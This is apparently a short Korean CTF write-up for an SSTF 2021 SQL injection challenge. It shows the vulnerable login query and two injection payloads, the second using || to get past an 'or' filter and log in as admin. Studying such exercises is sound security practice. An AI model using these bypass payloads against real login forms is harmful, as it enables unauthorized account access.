id : guest
pw : guest
admin으로 로그인해야 함을 알 수 있고, 힌트로 query를 보여주고 있다.
쿼리
select id from users where id='{$_GET["id"]}' and pw='{$_GET["pw"]}'
id : admin' or 1=1#
pw : 1
or이 필터링된다는 것을 알 수 있다.
or대신 ||을 사용해 공격을 시도했다.
id : admin' || '1'='1
pw : 1
공격을 성공할 수 있었다.
'CTF > SSTF [Hacker's Playground]' 카테고리의 다른 글
| [SSTF 2021] SQLi 102 (Hacker's Playground) (0) | 2021.08.19 |
|---|